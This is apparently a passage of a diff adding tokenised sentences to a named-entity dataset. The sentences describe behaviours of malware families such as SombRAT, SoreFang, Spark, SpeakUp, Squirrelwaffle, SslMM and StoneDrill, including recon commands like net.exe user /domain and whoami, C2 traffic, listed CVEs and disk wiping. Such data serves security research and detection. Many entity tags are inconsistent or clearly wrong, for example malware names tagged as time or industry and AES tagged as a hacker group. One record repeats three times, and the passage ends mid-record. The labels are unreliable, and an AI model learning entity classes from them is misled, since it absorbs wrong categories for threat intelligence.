"SombRAT", + "can", + "store", + "harvested", + "data", + "in", + "a", + "custom", + "database", + "under", + "the", + "%TEMP%", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "use", + "a", + "legitimate", + "process", + "name", + "to", + "hide", + "itself." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "the", + "ability", + "to", + "respawn", + "itself", + "using", + "<code>ShellExecuteW</code>", + "and", + "<code>CreateProcessW</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "the", + "ability", + "to", + "use", + "TCP", + "sockets", + "to", + "send", + "data", + "and", + "ICMP", + "to", + "ping", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "encrypt", + "strings", + "with", + "XOR-based", + "routines", + "and", + "use", + "a", + "custom", + "AES", + "storage", + "format", + "for", + "plugins,", + "configuration,", + "C2", + "domains,", + "and", + "harvested", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Tool", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "the", + "ability", + "to", + "modify", + "its", + "process", + "memory", + "to", + "hide", + "process", + "command-line", + "arguments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "use", + "the", + "<code>getprocesslist</code>", + "command", + "to", + "enumerate", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "the", + "ability", + "to", + "use", + "an", + "embedded", + "SOCKS", + "proxy", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "encrypted", + "its", + "C2", + "communications", + "with", + "AES." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "execute", + "<code>getinfo</code>", + "to", + "enumerate", + "the", + "computer", + "name", + "and", + "OS", + "version", + "of", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "execute", + "<code>getinfo</code>", + "to", + "identify", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "enumerate", + "services", + "on", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "execute", + "<code>getinfo</code>", + "to", + "discover", + "the", + "current", + "time", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "decode", + "and", + "decrypt", + "exfiltrated", + "data", + "sent", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "enumerate", + "domain", + "accounts", + "via", + "<code>net.exe", + "user", + "/domain</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "enumerate", + "domain", + "groups", + "by", + "executing", + "<code>net.exe", + "group", + "/domain</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "gain", + "access", + "by", + "exploiting", + "a", + "Sangfor", + "SSL", + "VPN", + "vulnerability", + "that", + "allows", + "for", + "the", + "placement", + "and", + "delivery", + "of", + "malicious", + "update", + "binaries." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "has", + "the", + "ability", + "to", + "list", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "download", + "additional", + "payloads", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "collect", + "usernames", + "from", + "the", + "local", + "system", + "via", + "<code>net.exe", + "user</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "has", + "the", + "ability", + "to", + "encode", + "and", + "RC6", + "encrypt", + "data", + "sent", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "enumerate", + "processes", + "on", + "a", + "victim", + "machine", + "through", + "use", + "of", + "Tasklist." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "gain", + "persistence", + "through", + "use", + "of", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "collect", + "the", + "hostname,", + "operating", + "system", + "configuration,", + "product", + "ID,", + "and", + "disk", + "space", + "on", + "victim", + "machines", + "by", + "executing", + "Systeminfo." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "collect", + "the", + "TCP/IP,", + "DNS,", + "DHCP,", + "and", + "network", + "adapter", + "configuration", + "on", + "a", + "compromised", + "host", + "via", + "<code>ipconfig.exe", + "/all</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "SoreFang", + "can", + "use", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "used", + "a", + "custom", + "XOR", + "algorithm", + "to", + "decrypt", + "the", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "exfiltrated", + "data", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "been", + "packed", + "with", + "Enigma", + "Protector", + "to", + "obfuscate", + "its", + "contents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "encoded", + "communications", + "with", + "the", + "C2", + "server", + "with", + "base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "can", + "collect", + "the", + "hostname,", + "keyboard", + "layout,", + "and", + "language", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "checked", + "the", + "results", + "of", + "the", + "<code>GetKeyboardLayoutList</code>", + "and", + "the", + "language", + "name", + "returned", + "by", + "<code>GetLocaleInfoA</code>", + "to", + "make", + "sure", + "they", + "contain", + "the", + "word", + "“Arabic”", + "before", + "executing." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "run", + "the", + "whoami", + "command", + "and", + "has", + "a", + "built-in", + "command", + "to", + "identify", + "the", + "user", + "logged", + "in." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "used", + "a", + "splash", + "screen", + "to", + "check", + "whether", + "an", + "user", + "actively", + "clicks", + "on", + "the", + "screen", + "before", + "running", + "malicious", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "has", + "used", + "HTTP", + "POST", + "requests", + "to", + "communicate", + "with", + "its", + "C2", + "server", + "to", + "receive", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spark", + "can", + "use", + "cmd.exe", + "to", + "run", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "Perl", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "cron", + "tasks", + "to", + "ensure", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "encodes", + "its", + "second-stage", + "payload", + "with", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SpeakUp", + "attempts", + "to", + "exploit", + "the", + "following", + "vulnerabilities", + "in", + "order", + "to", + "execute", + "its", + "malicious", + "script:", + "CVE-2012-0874,", + "CVE-2010-1871,", + "CVE-2017-10271,", + "CVE-2018-2894,", + "CVE-2016-3088,", + "JBoss", + "AS", + "3/4/5/6,", + "and", + "the", + "Hadoop", + "YARN", + "ResourceManager." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "B-Idus", + "B-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "SpeakUp", + "deletes", + "files", + "to", + "remove", + "evidence", + "on", + "the", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "downloads", + "and", + "executes", + "additional", + "files", + "from", + "a", + "remote", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "checks", + "for", + "availability", + "of", + "specific", + "ports", + "on", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "can", + "perform", + "brute", + "forcing", + "using", + "a", + "pre-defined", + "list", + "of", + "usernames", + "and", + "passwords", + "in", + "an", + "attempt", + "to", + "log", + "in", + "to", + "administrative", + "panels." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "Python", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "encodes", + "C&C", + "communication", + "using", + "Base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "the", + "<code>cat", + "/proc/cpuinfo", + "|", + "grep", + "-c", + "“cpu", + "family”", + "2>&1</code>", + "command", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "the", + "<code>ifconfig", + "-a</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "the", + "<code>arp", + "-a</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "the", + "<code>whoami</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SpeakUp", + "uses", + "POST", + "and", + "GET", + "requests", + "over", + "HTTP", + "to", + "communicate", + "with", + "its", + "main", + "C&C", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "has", + "been", + "signed", + "with", + "valid", + "digital", + "certificates." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "has", + "collected", + "data", + "and", + "other", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "can", + "download", + "malicious", + "files", + "from", + "threat", + "actor", + "controlled", + "AWS", + "URL's." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "has", + "the", + "ability", + "to", + "execute", + "arbitrary", + "JavaScript", + "code", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "has", + "been", + "executed", + "through", + "malicious", + "links", + "within", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "can", + "identify", + "payment", + "systems,", + "payment", + "gateways,", + "and", + "ATM", + "systems", + "in", + "compromised", + "environments." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Idus", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "can", + "check", + "for", + "the", + "presence", + "of", + "29", + "different", + "antivirus", + "tools." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "can", + "enumerate", + "running", + "software", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "has", + "been", + "distributed", + "via", + "emails", + "containing", + "a", + "malicious", + "link", + "that", + "appears", + "to", + "be", + "a", + "PDF", + "document." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "can", + "identify", + "the", + "system", + "name", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SpicyOmelette", + "can", + "identify", + "the", + "IP", + "of", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "encrypted", + "collected", + "data", + "using", + "a", + "XOR-based", + "algorithm." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "decrypted", + "files", + "and", + "payloads", + "using", + "a", + "XOR-based", + "algorithm." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "been", + "obfuscated", + "with", + "a", + "XOR-based", + "algorithm." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "exfiltrated", + "victim", + "data", + "using", + "HTTP", + "POST", + "requests", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "downloaded", + "and", + "executed", + "additional", + "encoded", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "relied", + "on", + "users", + "enabling", + "malicious", + "macros", + "within", + "Microsoft", + "Excel", + "and", + "Word", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "relied", + "on", + "victims", + "to", + "click", + "on", + "a", + "malicious", + "link", + "send", + "via", + "phishing", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "used", + "PowerShell", + "to", + "execute", + "its", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "been", + "executed", + "using", + "`regsvr32.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "been", + "executed", + "using", + "`rundll32.exe`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "been", + "packed", + "with", + "a", + "custom", + "packer", + "to", + "hide", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "been", + "distributed", + "via", + "malicious", + "Microsoft", + "Office", + "documents", + "within", + "spam", + "emails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "been", + "distributed", + "through", + "phishing", + "emails", + "containing", + "a", + "malicious", + "URL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "encoded", + "its", + "communications", + "to", + "C2", + "servers", + "using", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "gathered", + "victim", + "computer", + "information", + "and", + "configurations." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "collected", + "the", + "victim’s", + "external", + "IP", + "address." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "can", + "collect", + "the", + "user", + "name", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "contained", + "a", + "hardcoded", + "list", + "of", + "IP", + "addresses", + "to", + "block", + "that", + "belong", + "to", + "sandboxes", + "and", + "analysis", + "platforms." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "used", + "malicious", + "VBA", + "macros", + "in", + "Microsoft", + "Word", + "documents", + "and", + "Excel", + "spreadsheets", + "that", + "execute", + "an", + "`AutoOpen`", + "subroutine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "used", + "HTTP", + "POST", + "requests", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Squirrelwaffle", + "has", + "used", + "`cmd.exe`", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "SslMM", + "contains", + "a", + "feature", + "to", + "manipulate", + "process", + "privileges", + "and", + "tokens." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SslMM", + "identifies", + "and", + "kills", + "anti-malware", + "processes." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SslMM", + "has", + "a", + "hard-coded", + "primary", + "and", + "backup", + "C2", + "string." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SslMM", + "creates", + "a", + "new", + "thread", + "implementing", + "a", + "keylogging", + "facility", + "using", + "Windows", + "Keyboard", + "Accelerators." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "To", + "establish", + "persistence,", + "SslMM", + "identifies", + "the", + "Start", + "Menu", + "Startup", + "directory", + "and", + "drops", + "a", + "link", + "to", + "its", + "own", + "executable", + "disguised", + "as", + "an", + "“Office", + "Start,”", + "“Yahoo", + "Talk,”", + "“MSN", + "Gaming", + "Z0ne,”", + "or", + "“MSN", + "Talk”", + "shortcut." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Idus", + "O", + "B-Idus", + "B-SecTeam", + "O", + "B-SamFile", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "To", + "establish", + "persistence,", + "SslMM", + "identifies", + "the", + "Start", + "Menu", + "Startup", + "directory", + "and", + "drops", + "a", + "link", + "to", + "its", + "own", + "executable", + "disguised", + "as", + "an", + "“Office", + "Start,”", + "“Yahoo", + "Talk,”", + "“MSN", + "Gaming", + "Z0ne,”", + "or", + "“MSN", + "Talk”", + "shortcut." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Idus", + "O", + "B-Idus", + "B-SecTeam", + "O", + "B-SamFile", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "To", + "establish", + "persistence,", + "SslMM", + "identifies", + "the", + "Start", + "Menu", + "Startup", + "directory", + "and", + "drops", + "a", + "link", + "to", + "its", + "own", + "executable", + "disguised", + "as", + "an", + "“Office", + "Start,”", + "“Yahoo", + "Talk,”", + "“MSN", + "Gaming", + "Z0ne,”", + "or", + "“MSN", + "Talk”", + "shortcut." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Idus", + "O", + "B-Idus", + "B-SecTeam", + "O", + "B-SamFile", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "SslMM", + "sends", + "information", + "to", + "its", + "hard-coded", + "C2,", + "including", + "OS", + "version,", + "service", + "pack", + "information,", + "processor", + "speed,", + "system", + "name,", + "and", + "OS", + "install", + "date." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SslMM", + "sends", + "the", + "logged-on", + "username", + "to", + "its", + "hard-coded", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Starloader", + "decrypts", + "and", + "executes", + "shellcode", + "from", + "a", + "file", + "called", + "Stars.jps." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Starloader", + "has", + "masqueraded", + "as", + "legitimate", + "software", + "update", + "packages", + "such", + "as", + "Adobe", + "Acrobat", + "Reader", + "and", + "Intel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "a", + "disk", + "wiper", + "module", + "that", + "targets", + "files", + "other", + "than", + "those", + "in", + "the", + "Windows", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "can", + "wipe", + "the", + "accessible", + "physical", + "or", + "logical", + "drives", + "of", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "can", + "wipe", + "the", + "master", + "boot", + "record", + "of", + "an", + "infected", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "obfuscated", + "its", + "module", + "with", + "an", + 